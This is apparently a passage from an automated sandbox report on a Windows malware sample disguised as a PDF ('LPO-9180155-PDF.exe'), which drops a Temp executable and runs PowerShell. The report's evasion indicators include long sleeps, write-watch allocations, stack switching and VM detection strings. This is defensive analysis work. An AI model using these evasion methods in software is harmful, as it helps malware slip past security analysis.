Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe API/Special instruction interceptor: Address: 1F82564
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Memory allocated: 21460000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Memory allocated: 23460000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599199 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598653 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598530 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598421 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598303 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597959 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597843 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597734 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597624 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597515 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597294 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597184 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597077 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596965 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596749 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596639 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596531 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596421 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596312 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596201 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596093 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595537 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595421 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595312 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595193 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595068 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594468 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594359 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594249 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6369 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3390 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Window / User API: threadDelayed 3522 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Window / User API: threadDelayed 6315 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6136 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -22136092888451448s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 5352 Thread sleep count: 3522 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 5352 Thread sleep count: 6315 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -599199s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -599093s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -598984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -598874s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -598765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -598653s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -598530s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -598421s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -598303s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -598187s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -598078s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -597959s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -597843s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -597734s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -597624s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -597515s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -597406s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -597294s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -597184s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -597077s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -596965s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -596859s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -596749s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -596639s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -596531s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -596421s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -596312s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -596201s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -596093s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -595984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -595874s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -595765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -595656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -595537s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -595421s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -595312s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -595193s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -595068s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -594828s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -594703s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -594578s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -594468s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -594359s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968 Thread sleep time: -594249s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0040276E FindFirstFileW, 6_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 6_2_00405770
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0040622B FindFirstFileW,FindClose, 6_2_0040622B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599199 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598653 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598530 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598421 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598303 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597959 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597843 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597734 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597624 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597515 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597294 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597184 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 597077 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596965 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596749 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596639 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596531 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596421 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596312 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596201 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 596093 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595537 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595421 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595312 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595193 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 595068 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594468 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594359 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread delayed: delay time: 594249 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\forgrovelse\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: Forbundsstater.exe, 00000006.00000002.2662544799.000000000554E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: Forbundsstater.exe, 00000006.00000002.2662544799.00000000055A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Forbundsstater.exe, 00000006.00000002.2675832398.0000000023E34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
